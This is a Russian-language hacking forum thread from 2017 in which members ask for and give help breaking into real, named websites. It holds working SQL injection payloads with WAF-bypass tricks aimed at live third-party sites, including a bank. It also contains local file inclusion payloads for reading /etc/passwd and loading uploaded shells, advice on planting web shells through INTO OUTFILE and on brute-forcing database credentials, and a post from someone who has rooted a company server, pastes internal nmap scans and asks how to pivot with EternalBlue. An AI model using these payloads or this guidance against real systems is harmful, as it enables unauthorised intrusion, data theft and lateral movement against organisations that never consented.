laravel_session={"iv":"kukvwyZIpbKq2DF04ezuaw==","value":"mfnS31uTq698oBq\/WeOjIKMsA4r6xwRSp9jgdz+isz8EYYB9b+7wFF8HBWAo6zNBDf InTJuYvDEKEXJAPmDXxA==","mac":"62708ac7ec9866ff62df69882858df81e817bb155c2e38ccd1 e829037c13ea02In0%3D


что это такое. с чем его едят?

t0ma5
26.05.2017, 14:10
ACat said:
↑ (https://antichat.live/posts/4089654/)
что это такое. с чем его едят?


можно же погуглить, токен от межсайтовой подделки запросов

http://repository.root-me.org/Explo... loose comparison - Type Juggling - OWASP.pdf (http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20PHP%20loose%20comparison%20-%20Type%20Juggling%20-%20OWASP.pdf) - примерно в середине рассказывает про баг в ларавеле для обхода проверки XSRF, вообще хорошая pdf, про типы данных и проверки

ACat
26.05.2017, 14:17
ти клясный

t0ma5
26.05.2017, 14:33
ACat said:
↑ (https://antichat.live/posts/4089665/)
...


фу чел( плюсануть пост вполне достаточно

ACat
27.05.2017, 02:00
t0ma5 said:
↑ (https://antichat.live/posts/4089675/)
фу чел( плюсануть пост вполне достаточно


чувак, я - Кот.

ACat
27.05.2017, 19:03
Парни подскажите что можно попробовать в такой ситуации:

par1=sleep(20) -> time = 20024 ms

par1=eval(sleep(20)) -> time 2000ms

и так далее....

Как определить что за интерпретатор принимает параметр? Чей код инжектить?

mcmagnus
30.05.2017, 10:24
Справшивал по phpbb 3.0.5 - есть в нем уязвимости??? Кто нибудь ответит??? ))

brown
30.05.2017, 11:53
google phpbb 3.0.5 exploit

kacergei
31.05.2017, 08:48
Добрый подскажите, как раскрутить данную sql (параметр id)

.SpoilerTarget" type="button">Spoiler: посмотреть
Авторизация:


Code:
bringthemes.com/natural-food/home-1/admin/ (demo/demo)

Пробую:


Code:
bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&token=Hc0bs042rmLz50tctvPv2grNiWgYZqaF&id='+AND+EXTRACTVALUE(5632,CONCAT(0x3a,((select(su bstring(group_concat(username),1,32))from(oc_user) ))))--+uHHl


но в ответ постоянная загрузка и отрубает (Error - Connection reset)

Подскажите что фильтрует и как обойти?

обратил внимание что не нравится ему select и group_concat, но могу ошибаться в разных вариациях не выходит никак((

SooLFaa
31.05.2017, 20:51
kacergei said:
↑ (https://antichat.live/posts/4091288/)
Добрый подскажите, как раскрутить данную sql (параметр id)
Spoiler: посмотреть
Авторизация:

Code:
bringthemes.com/natural-food/home-1/admin/ (demo/demo)

Пробую:

Code:
bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&token=Hc0bs042rmLz50tctvPv2grNiWgYZqaF&id='+AND+EXTRACTVALUE(5632,CONCAT(0x3a,((select(su bstring(group_concat(username),1,32))from(oc_user) ))))--+uHHl

но в ответ постоянная загрузка и отрубает (Error - Connection reset)
Подскажите что фильтрует и как обойти?
обратил внимание что не нравится ему select и group_concat, но могу ошибаться в разных вариациях не выходит никак((


Зачем идти в Москву через Китай


Code:
http://bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&id=-1 union /*!12345select*/ 1,2,3,4,user(),version%0A(),7 --+uHHl&token=nGLvYhzmGxV0JoQDKfwjr1xiBwes8qoF

Бапассить select можно старыми добрыми комментами

А байпассить функции с помощью %0A перед ()

UPD: И ты используешь error-based хотя здесь самый обычный UNION

extjs
31.05.2017, 22:36
/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23

Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.

SooLFaa
01.06.2017, 01:29
extjs said:
↑ (https://antichat.live/posts/4091562/)
/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23
Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.


Таргет дай нормальный, векторов куча, если hacking attemp - это скорее всего mod security - он байпассится в том числе векторов на один пост выше

mcmagnus
01.06.2017, 09:13
brown said:
↑ (https://antichat.live/posts/4091025/)
google phpbb 3.0.5 exploit


Благодарю, но хотелось бы развернутого ответа, если не сложно.

Gorev
01.06.2017, 09:49
extjs said:
↑ (https://antichat.live/posts/4091562/)
/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23
Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.


/!*50000bla bla bla*/

ACat
01.06.2017, 13:49
extjs said:
↑ (https://antichat.live/posts/4091562/)
/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23
Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.


попробуй передать id с помощью POST

Попробуй url encode

Попробуй char encode

sepo
10.06.2017, 00:16
всем привет,

кто может, помогиет раскрутить эту скулю:


Code:
http://www.sala amsombank.com/pages.php?id=\

ACat
10.06.2017, 02:25
sepo said:
↑ (https://antichat.live/posts/4095038/)
всем привет,
кто может, помогиет раскрутить эту скулю:

Code:
http://www.sala amsombank.com/pages.php?id=\



с чего вы решили, что она раскручивабельна?

sepo
10.06.2017, 03:21
ACat said:
↑ (https://antichat.live/posts/4095057/)
с чего вы решили, что она раскручивабельна?


всмысле??

ACat
10.06.2017, 20:18
sepo said:
↑ (https://antichat.live/posts/4095065/)
всмысле??


там нету иньекции, там есть ошибка от спец-символа.

логика не срабатывает.

http://www.salaamsombank.com/pages.php?id=(1) (http://www.salaamsombank.com/pages.php?id=%281%29)

swat_
12.06.2017, 23:59
подскажите пожалуйста есть ли в этом коде уязвимость ,если есть ток как её воспроизвести

file.php?url=site.com%00 на такой запрос выдает ошибку

Warning: include_once(): Failed opening 'site.com' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/domain.site.com/file.php on line 23


PHP:

ACat
13.06.2017, 00:33
на сколько я понимаю - url=../../../etc/passwd%00

url=../../../var/www/site/upload/evil_avatar_with_shell_code.gif%00

при условии, что функция basename() нам ничего не портит.

swat_
13.06.2017, 00:45
file.php?url=../../../etc/passwd%00

Warning: include_once(): Failed opening 'passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/domain.site.com/file.php on line 23

ACat
13.06.2017, 01:23
http://www.php.su/functions/?basename


Code:


то бишь вектор сужается до дириктории, из которой выполняется сценарий.

crlf
13.06.2017, 01:34
swat_ said:
↑ (https://antichat.live/posts/4095816/)
подскажите пожалуйста есть ли в этом коде уязвимость


Уязвимость есть, но не шибко юзабельная. Если положить или изменить любой файл в этой директории, будет RCE.

Так же стоит посмотреть, можно ли там подцепить что-то интересное для дальнейшего развития атаки. Простейший пример:

Уязвим index.php. Рядом лежит upload.php который подключается в admin.php. В админку стоит логин/пароль, а upload.phpпроверяет наличие коннекта к базе и не может быть вызван напрямую. Следовательно, воспользовавшись локальным инклудом в index.php можно подцепить скрипт загрузки и залить что-то нехорошее

IvanPa
13.06.2017, 16:30
всем привет. хочу в свой Интернет магазин впендюрить чат. Допустим клиент заходит на главную страницу сайта и появляется окно чата где оператор или бот ( вначале) помогает клиенту с выбором товара. Помогите оценить какие либо риски. Какие уязвимости стоит рассмотреть. Вообще большинство таких чатов представляют опасность ?

ACat
13.06.2017, 17:55
IvanPa said:
↑ (https://antichat.live/posts/4095994/)
всем привет. хочу в свой Интернет магазин впендюрить чат. Допустим клиент заходит на главную страницу сайта и появляется окно чата где оператор или бот ( вначале) помогает клиенту с выбором товара. Помогите оценить какие либо риски. Какие уязвимости стоит рассмотреть. Вообще большинство таких чатов представляют опасность ?


Для начала скажите какую платформу вы используете.

В зависимости от этого можно будет обрисовать потенциальные уязвимости.

Опаснотсть представляют не чаты, опасность представляют упущения в коде.

А за небольшую сумму проведу black box + white box аудит с подробным отчетом.

DezMond™
13.06.2017, 19:33
Что можно сделать тут?


Code:
http://www.rapibus.sto.ca/index.php?id=176&no_cache=1&tx_ttnews[tt_news]=169'&tx_ttnews[backPid]=176&cHash=1ee0e52092

ACat
13.06.2017, 23:13
DezMond™ said:
↑ (https://antichat.live/posts/4096042/)
Что можно сделать тут?

Code:
http://www.rapibus.sto.ca/index.php?id=176&no_cache=1&tx_ttnews[tt_news]=169'&tx_ttnews[backPid]=176&cHash=1ee0e52092



SERVER /index.php?id=176&no_cache=1&tx_ttnews[backPid]=176&tx_ttnews[tt_news]=169' or 1='1 HTTP/1.1

Host: www.rapibus.sto.ca (http://www.rapibus.sto.ca)

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Cookie:

Connection: close

Content-Length: 0

DezMond™
13.06.2017, 23:16
ACat said:
↑ (https://antichat.live/posts/4096088/)
SERVER /index.php?id=176&no_cache=1&tx_ttnews[backPid]=176&tx_ttnews[tt_news]=169' or 1='1 HTTP/1.1
Host:
www.rapibus.sto.ca (http://www.rapibus.sto.ca)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie:
Connection: close
Content-Length: 0


и чего ты добился? Боюсь спросить, с чего ты скопировал?

ACat
13.06.2017, 23:27
DezMond™ said:
↑ (https://antichat.live/posts/4096090/)
и чего ты добился? Боюсь спросить, с чего ты скопировал?


обошел ваф. из бурпа.

ACat
13.06.2017, 23:28
BabaDook said:
↑ (https://antichat.live/posts/4096089/)
Ух ты, как ты это сделал?


ssu

мне бы наставника

ACat
13.06.2017, 23:38
скорее так себе маркетолог

я могу аудировать лишь пхп платформу из веб платформ

и владею не всеми критикал уязвимостями

кстати, https://ru.wikipedia.org/wiki/HTTP тут этого почему-то нету

ACat
13.06.2017, 23:44
из веб платформ

имеется в виду, что ASP/JSP для меня ХЗ...

>чего там нету ?

SERVER

ACat
13.06.2017, 23:52
BabaDook said:
↑ (https://antichat.live/posts/4096106/)
asp не веб, согласен.
И вправду, нету, напиши им репорт, пускай добавит(исправит багу)


это приват, ёпт) зеродей))

блек-хэт рулез и все такое

crlf
13.06.2017, 23:53
А ещё там нету:


Code:
BLABLABLA /index.php?id=5 HTTP/1.1
Host: www.rapibus.sto.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close


Весь веб не охватишь, сервис может быть написан на чём угодно, например https://habrahabr.ru/post/318916/.

ACat
14.06.2017, 00:00
crlf said:
↑ (https://antichat.live/posts/4096109/)
А ещё там нету:

Code:
BLABLABLA /index.php?id=5 HTTP/1.1
Host: www.rapibus.sto.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close

Весь веб не охватишь, сервис может быть написан на чём угодно, например
https://habrahabr.ru/post/318916/
.


ти! ти сломал мой зеродей, злодэй)

а на счёт asp он что, не уязвим? типа как линукс относительно винды asp относительно php?

crlf
14.06.2017, 00:10
ACat said:
↑ (https://antichat.live/posts/4096113/)
а на счёт asp он что, не уязвим? типа как линукс относительно винды asp относительно php?


Как-то так

http://s03.radikal.ru/i176/1706/2f/e5159869808b.png (http://radikal.ru)

ACat
14.06.2017, 00:12
crlf said:
↑ (https://antichat.live/posts/4096115/)
Как-то так
https://i.imgur.com/nVk8zpr.png


ознакомимся, спасибо

ACat
14.06.2017, 00:26
картиночка смешная)

но я про реальное добывание профита веду речь.

Дело в том, профит-то надо добывать, семью кормить. В ЮА обьяснить дяде из 90-х что ему нужно безопасность за косарь грина - трудно.

Взломаешь, дефейснешь - с бэкапа востановят. 10 раз дефейснешь - 10 раз востановят.

С каждым днем все переходят на фреймворки, где багов либо нет, либо их найти крайне трудно, эксплуатировать - ещё труднее.

В общем я о том, что поле с хлебом сужается, камней становится больше, а серп все тот же, что в 2007, или когда там Dr.Z3r0 писал фак по мускулу

DezMond™
19.06.2017, 13:34
DezMond™ said:
↑ (https://antichat.live/posts/4096042/)
Что можно сделать тут?

Code:
http://www.rapibus.sto.ca/index.php?id=176&no_cache=1&tx_ttnews[tt_news]=169'&tx_ttnews[backPid]=176&cHash=1ee0e52092



Ни у кого не получилось раскрутить? только тайм бэйс?

aka PSIH
21.06.2017, 16:05
Доброго времени суток! Какие есть способы обойти фильтр на _ (нижнее подчеркивание) в sql-inj?

Фильтр в имени таблицы обошел, как обойти в названии колонки?

на запрос (select+table_name+FROM+(SELECT+0x696E666F726D6174 696F6E5F736368656D612E7461626C6573)%20AS%20t2) отвечает:


...syntax to use near 'table\_name'....


%5f и %255f не проходит

t0ma5
21.06.2017, 16:30
aka PSIH said:
↑ (https://antichat.live/posts/4098430/)
Доброго времени суток! Какие есть способы обойти фильтр на _ (нижнее подчеркивание) в sql-inj?
Фильтр в имени таблицы обошел, как обойти в названии колонки?
на запрос (select+table_name+FROM+(SELECT+0x696E666F726D6174 696F6E5F736368656D612E7461626C6573)%20AS%20t2) отвечает:
%5f и %255f не проходит


не, так тоже не получится


Code:
> select table_name FROM (SELECT 0x696E666F726D6174696F6E5F736368656D612E7461626C65 73)t1 limit 1;
Unknown column 'table_name' in 'field list'

aka PSIH
21.06.2017, 17:41
t0ma5 said:
↑ (https://antichat.live/posts/4098440/)
не, так тоже не получится

Code:
> select table_name FROM (SELECT 0x696E666F726D6174696F6E5F736368656D612E7461626C65 73)t1 limit 1;
Unknown column 'table_name' in 'field list'



У меня такой запрос проходит, инфу из колонок где нет "_" в имени выводит нормально.

Вопрос как обойти фильтр на "_"

t0ma5
21.06.2017, 17:57
aka PSIH said:
↑ (https://antichat.live/posts/4098479/)
У меня такой запрос проходит, инфу из колонок где нет "_" в имени выводит нормально.
Вопрос как обойти фильтр на "_"


хм вроде не должно оно так работать

попробуй ради интереса вывести инфу из таблицы COLUMNS колонку например PRIVILEGES(там должно быть 'select' 'insert' etc), если к таблицам доступ таки есть, то можно подумать

aka PSIH
21.06.2017, 18:07
t0ma5 said:
↑ (https://antichat.live/posts/4098481/)
хм вроде не должно оно так работать
попробуй ради интереса вывести инфу из таблицы COLUMNS колонку например PRIVILEGES(там должно быть 'select' 'insert' etc), если к таблицам доступ таки есть, то можно подумать


Этот способ я в этой же теме нашел доступ к таблицам есть

t0ma5
21.06.2017, 18:17
aka PSIH said:
↑ (https://antichat.live/posts/4098486/)
Этот способ я в этой же теме нашел
доступ к таблицам есть


так данные выводятся или нет)?

дай линк на способ, хочу посмотреть, в теме 100 страниц

Xsite
21.06.2017, 18:29
t0ma5 said:
↑ (https://antichat.live/posts/4098488/)
так данные выводятся или нет)?
дай линк на способ, хочу посмотреть, в теме 100 страниц


Способ очень прост ,допустим мы знаем что есть таблица "_"users ,мы можешь предположить что там есть колонки email,pass ,информацию сразу из них надо выводить

на примере мепа -D bblalala -T "_"users --columns

t0ma5
21.06.2017, 18:42
[QUOTE="Xsite"]
Xsite said:
↑ (https://antichat.live/posts/4098490/)
Способ очень прост ,допустим мы знаем что есть таблица "_"users ,мы можешь предположить что там есть колонки email,pass ,информацию сразу из них надо выводить
на примере мепа -D bblalala -T "_"users --columns

aka PSIH
21.06.2017, 20:08
t0ma5 said:
↑ (https://antichat.live/posts/4098488/)
так данные выводятся или нет)?
дай линк на способ, хочу посмотреть, в теме 100 страниц


в этом посте подсмотрел /threads/46016/page-1105#post-3472979 (https://antichat.live/threads/46016/page-1105/)

еще раз, данные выводятся, НО только из тех колонок у которых в имени нету "_".

Этим способом мне удалось обойти фильтрацию "_" в имени таблицы, но чтобы вытащить нужные данные необходимо обойти фильтрацию "_" в имени колонки!

t0ma5
21.06.2017, 20:26
aka PSIH said:
↑ (https://antichat.live/posts/4098515/)
в этом посте подсмотрел
/threads/46016/page-1105#post-3472979 (https://antichat.live/threads/46016/page-1105/)
еще раз, данные выводятся, НО только из тех колонок у которых в имени нету "_".
Этим способом мне удалось обойти фильтрацию "_"
в имени таблицы,
но чтобы вытащить нужные данные необходимо обойти фильтрацию "_"
в имени колонки
!


ну ок, выводятся дак выводятся) хотя я всё равно не верю, мне кажется ты не проверял


Code:
> SELECT * FROM (SELECT 0x696E666F726D6174696F6E5F736368656D612E7461626C65 73) AS t2;
+------------------------------------------------------+
| 0x696E666F726D6174696F6E5F736368656D612E7461626C65 73 |
+------------------------------------------------------+
| information_schema.tables |
+------------------------------------------------------+
1 row in set (0.00 sec)

не чует мускул таблицу в таком виде, from не eval, на лету данные не конвертит

запрос через get идёт? post'ом пробовал отправлять?

danil911
26.06.2017, 21:16
Есть скуля, но она в одном фреймворке, который триггерует на слэш " / " (фреймворк, потому как на другом сайте такая же ситуация). Я в курсе, что слэш никак не мешает доставать полезную информацию, это сделано, но есть теоретическая возможность залития шелла (file priv Y, пути есть), но указывать пути не могу по причине того, что не работает флеш ( INTO OUTFILE "путь/до/шелла")

Что посоветуете ?

erwerr2321
26.06.2017, 21:21
hex encode

dooble
28.06.2017, 11:17
ms13 said:
↑ (https://antichat.live/posts/4100087/)
hex encode


В INTO OUTFILE "путь/до/шелла"

не получится хексить путь.

Если слеш режется - заливка через into outfile обламывается.

Путь должен быть написан так, как его понимает система.

На винде можно пробовать обратный слеш - "\".

Octavian
29.06.2017, 21:49
Что делать фильтруются двоиные кавычки


Code:
value=""alert(1)"

r00t_hack
01.07.2017, 13:07
its very good service thank you for thhis.

y-es
02.07.2017, 01:03
Почему так высок спрос на МД5? Как бэ уже давно устарел, даже SHA1 уже не рекомендован.

Более того не понимаю почему народ не делает RAINBOW сервер? Он же легко делается

BabaDook
02.07.2017, 22:07
как стать хакером ?

y-es
02.07.2017, 22:10
BabaDook said:
↑ (https://antichat.live/posts/4101785/)
как стать хакером ?


укради перчатку хакермана

https://pbs.twimg.com/profile_images/734418047042228226/yPvtvPiQ.jpg

ACat
04.07.2017, 00:27
залился на сервак, повысился до рута, я в линуксе запущеном на vmware.

Сетка компании, в сетке есть пару виндовых машин и пару виртуалок на них.

Как атаковать сетку?? Как запустить ентерналблу и натравить его на винду с виртуалки?

Может можно как-то пробросить трафик с моей машины в их сеть, что бы не поднимать на чужём ОС своё обладнення?

спасибо

y-es
04.07.2017, 00:33
Глянь как опознаются машины в сети - ip/mask & mac.

Можешь замаскироваться за виндовую машину, только тебе можен помешать сетевая техника

kacergei
04.07.2017, 06:56
Добрый,

подскажите, есть ли здесь sql-injection и как её раскрутить, как тока не пробовал ничего не берет, sqlmap глухо с разными тамперами((

.SpoilerTarget" type="button">Spoiler: site
mmosoc275.2x.mmosolution.com/admin/index.php?route=ticket/ticket&token=j29jGuAj6LSZYPBNeBl94dEidP92Kdvc&sort=email&order=DESC

Логин/Пароль: demo

Параметр: sort

ACat
04.07.2017, 10:08
y-es said:
↑ (https://antichat.live/posts/4102111/)
Глянь как опознаются машины в сети - ip/mask & mac.
Можешь замаскироваться за виндовую машину, только тебе можен помешать сетевая техника


ifconfig

eth0 Link encap:Ethernet HWaddr 52:54:00:85:E5:01

inet addr:192.168.1.52 Bcast:192.168.1.255 Mask:255.255.255.0

inet6 addr: fe80::5054:ff:fe85:e501/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:50029039 errors:0 dropped:209 overruns:0 frame:0

TX packets:26546699 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:314731670 (300.1 MiB) TX bytes:1387961011 (1.2 GiB)

Interrupt:10 Base address:0xe000

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

inet6 addr: ::1/128 Scope:Host

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:104853 errors:0 dropped:0 overruns:0 frame:0

TX packets:104853 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:21969819 (20.9 MiB) TX bytes:21969819 (20.9 MiB)


Nmap scan report for 2.corp (192.168.1.2)
Host is up (0.0039s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh Cisco SSH 1.25 (protocol 2.0)
23/tcp open telnet Cisco router
80/tcp open http Cisco IOS http config
443/tcp open ssl/http Cisco IOS http config
MAC Address: 28:94:0F:4F:00:C7 (Unknown)
Device type: switch
Running: Cisco IOS 12.X
OS details: Cisco 2950, 2960, 3550, 3560, or 3750 switch (IOS 12.1 - 12.2)
Network Distance: 1 hop
Service Info: OS: IOS; Device: router
Nmap scan report for 3.corp (192.168.1.36)
Host is up (0.00068s latency).
Not shown: 979 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601
80/tcp open http Microsoft IIS httpd 7.5
88/tcp open kerberos-sec Microsoft Windows kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open ssl/http Microsoft IIS httpd 7.5
445/tcp open netbios-ssn
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap
3268/tcp open ldap
3269/tcp open ssl/ldap
3389/tcp open microsoft-rdp Microsoft Terminal Service
6129/tcp open unknown
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC

danil911
05.07.2017, 08:29
Снова поднимается вопрос про шелл, найдена скуля со stacked queries, т.е могу делать insert update delete и.т.д, работает, но интересует не добавления себя в админы, а конкретно залитие шелла при помощи sql команды, знак слеша " / " фильтруется и при помощи хекса не робит, есть такая возможность ?

dooble
05.07.2017, 10:46
danil911 said:
↑ (https://antichat.live/posts/4102611/)
Снова поднимается вопрос про шелл, найдена скуля со stacked queries, т.е могу делать insert update delete и.т.д, работает, но интересует не добавления себя в админы, а конкретно залитие шелла при помощи sql команды, знак слеша " / " фильтруется и при помощи хекса не робит, есть такая возможность ?


Если в качестве БД используется MySQL (или форки) - то чисто средствами мускула не получится.

Проще смотреть в админке, есть ли заливка или выполнения кода (в шаблонах к примеру).

Или читать скрипты сайта, искать другие уязвимости, типа LFI, RCE, заливки (попутно могут обозначиться сторонние скрипты с известными багами).

ACat
05.07.2017, 11:04
danil911 said:
↑ (https://antichat.live/posts/4102611/)
Снова поднимается вопрос про шелл, найдена скуля со stacked queries, т.е могу делать insert update delete и.т.д, работает, но интересует не добавления себя в админы, а конкретно залитие шелла при помощи sql команды, знак слеша " / " фильтруется и при помощи хекса не робит, есть такая возможность ?


можно обойти WAF или попробовать подкдючиться к серверу сбрутив пароли из mysql.user

если скуля в GET попробуй POST/HEADER/BLABLALBA1212

danil911
05.07.2017, 11:16
ACat said:
↑ (https://antichat.live/posts/4102655/)
можно обойти WAF или попробовать подкдючиться к серверу сбрутив пароли из mysql.user
если скуля в GET попробуй POST/HEADER/BLABLALBA1212


Пробовал обойти waf, юзая тамперы и смотря на ф-и вроде charencode и.т.д, не вышло, а касательно подключиться к серверу, сбрутил пароли из юзера, это уже сделано, но ,как я понимаю, для подключения нужно чтобы был открыт 3306 порт мускульный ? Nmap говорит, что нету.


dooble said:
↑ (https://antichat.live/posts/4102649/)
Если в качестве БД используется MySQL (или форки) - то чисто средствами мускула не получится.
Проще смотреть в админке, есть ли заливка или выполнения кода (в шаблонах к примеру).
Или читать скрипты сайта, искать другие уязвимости, типа LFI, RCE, заливки (попутно могут обозначиться сторонние скрипты с известными багами).


С админкой странный облом, я давно сбрутил хеш, да и к тому же могу сам себя внести как админа (insert into, update и.т.д), но найдя админку и зайдя во внутрь...происходит просто редирект на главную сайта, никаких новых способностей и ф-ий не появляется, хз почему так реализовано )

dooble
05.07.2017, 11:50
danil911 said:
↑ (https://antichat.live/posts/4102674/)
С админкой странный облом, я давно сбрутил хеш, да и к тому же могу сам себя внести как админа (insert into, update и.т.д), но найдя админку и зайдя во внутрь...происходит просто редирект на главную сайта, никаких новых способностей и ф-ий не появляется, хз почему так реализовано )


Читать скрипты (и .htaccess) и разбираться.

load_file().

ACat
05.07.2017, 12:00
он же сказал, что фильтруется слэш.

Ищи админку. ищи другую админку. ищи какие-то интерфейсы на суб-доменах. заюзай dnsenum с нормальным словарём.

но мне кажется это гонево что фильтруется слэш

dooble
06.07.2017, 13:32
ACat said:
↑ (https://antichat.live/posts/4102708/)
он же сказал, что фильтруется слэш.


Не вводи в заблуждение,

into outfile '/patch/file' требует "натуральный" слеш,

а load_file(0x2F6574632F706173737764) вполне читает '/etc/passwd'.

Так что, если у мускула есть права на чтение файлов сайта, то посмотреть исходники будет полезно.

ACat
06.07.2017, 15:07
ух ты, плюсик

Mexel
07.07.2017, 20:50
http://www.cvedetails.com/cve/CVE-2013-1862/

Не пойму как использовать,можете подсказать?

SaNDER
07.07.2017, 20:55
Есть уязвимый сайт.

Через /download.php можно скачивать файлы,скачал passwd,но там все на X закрыто пароли.

Есть на сайте файл config.php.Можно ли с помощью данной уязвимости скачать его и как ?

crlf
07.07.2017, 21:42
Mexel said:
↑ (https://antichat.live/posts/4103485/)
http://www.cvedetails.com/cve/CVE-2013-1862/ (https://www.cvedetails.com/cve/CVE-2013-1862/)
Не пойму как использовать,можете подсказать?


На сколько я понимаю, это атака не на сервер, а на пользователя который будет просматривать ядовитый лог. В следствии чего, из-за внедрённых последовательностей, в его терминале может исполниться произваольный код.


SaNDER said:
↑ (https://antichat.live/posts/4103490/)
Есть уязвимый сайт.
Через /download.php можно скачивать файлы,скачал passwd,но там все на X закрыто пароли.
Есть на сайте файл config.php.Можно ли с помощью данной уязвимости скачать его и как ?


В passwd пароли не хранятся, они в лежат в shadow. Права на чтение есть только у рута. Если можно просмаривать /etc/passwd или /etc/fstab,а config.php или другие php файлы нет, значит там инклуд. Иначе, нужно подобрать или найти путь до конфига.

SaNDER
07.07.2017, 22:04
crlf said:
↑ (https://antichat.live/posts/4103506/)
На сколько я понимаю, это атака не на сервер, а на пользователя который будет просматривать ядовитый лог. В следствии чего, из-за внедрённых последовательностей, в его терминале может исполниться произваольный код.
В
passwd
пароли не хранятся, они в лежат в
shadow
. Права на чтение есть только у рута. Если можно просмаривать
/etc/passwd
или
/etc/fstab,
а
config.php
или другие php файлы нет, значит там инклуд. Иначе, нужно подобрать или найти путь до конфига.


Я уже не знаю как эту уязвимость то и использовать.

К тому же путь до конфига я не знаю.

BabaDook
07.07.2017, 22:11
SaNDER said:
↑ (https://antichat.live/posts/4103517/)
Я уже не знаю как эту уязвимость то и использовать.
К тому же путь до конфига я не знаю.


Не подскажешь как быть хакером ?

crlf
07.07.2017, 23:30
SaNDER said:
↑ (https://antichat.live/posts/4103517/)
К тому же путь до конфига я не знаю.


Искать раскрытие путей, phpinfo, проверить дефолтные пути CMS, брут и так далее.


BabaDook said:
↑ (https://antichat.live/posts/4103518/)
Не подскажешь как быть хакером ?


Изи /threads/453193/ (https://antichat.live/threads/453193/)

BabaDook
07.07.2017, 23:38
Пойду админшу топтать

ACat
08.07.2017, 00:17
SaNDER said:
↑ (https://antichat.live/posts/4103517/)
Я уже не знаю как эту уязвимость то и использовать.
К тому же путь до конфига я не знаю.


можно пробрутить дефолтные конфиги, предварительно пробрутив папки на самом серваке дирбастером.

потом найти парлоли к БД или к ФТП

crlf
08.07.2017, 00:24
Самый простой совет забыл


SaNDER said:
↑ (https://antichat.live/posts/4103490/)
Через /download.php можно скачивать файлы,скачал passwd,


Если там читалка, прочитай download.php или любой другой и посмотри что инклудится в них. В одном из них должен быть конфиг.

SaNDER
08.07.2017, 09:16
Я скачал и файл Download.php и Config.php .

Логин и пароль от БД есть,порт на сайте 3306 есть,как через kali законнектится ?

P.S -- Нашёл в директория /pma там можно было зайти в БД,зашёл и нашёл таблицу users,но её почему то не открывает(404 ошибка reg.ru),хотя когда мышкой на таблицу наводишь показывает : Browse: (4 Rows) .

Да и вообще с любой колонкой,таблицой так .

Вот код download.php


Code:

ACat
08.07.2017, 11:54
SaNDER said:
↑ (https://antichat.live/posts/4103602/)
Я скачал и файл Download.php и Config.php .
Логин и пароль от БД есть,порт на сайте 3306 есть,как через kali законнектится ?
P.S -- Нашёл в директория /pma там можно было зайти в БД,зашёл и нашёл таблицу users,но её почему то не открывает(404 ошибка reg.ru),хотя когда мышкой на таблицу наводишь показывает : Browse: (4 Rows) .
Да и вообще с любой колонкой,таблицой так .
Вот код download.php

Code:




так если ты в ПМА, от какого ты юзера, есть ли у юзера файл прив? Если да - лей шелл.

Какая версия самого ПМА установлена? ПМА тоже бывают с багами.

ACat
08.07.2017, 16:14
Парни, если в гет или пост запросе к серверу идут серилизированные данные - является ли это уязвимостью?

Бурп пометил как критикал

BabaDook
08.07.2017, 16:17
ACat said:
↑ (https://antichat.live/posts/4103725/)
Парни, если в гет или пост запросе к серверу идут серилизированные данные - является ли это уязвимостью?
Бурп пометил как критикал


Ты хакер?

crlf
08.07.2017, 16:52
ACat said:
↑ (https://antichat.live/posts/4103725/)
Парни, если в гет или пост запросе к серверу идут серилизированные данные - является ли это уязвимостью?


Зависит от ЯП и контекста.

Mexel
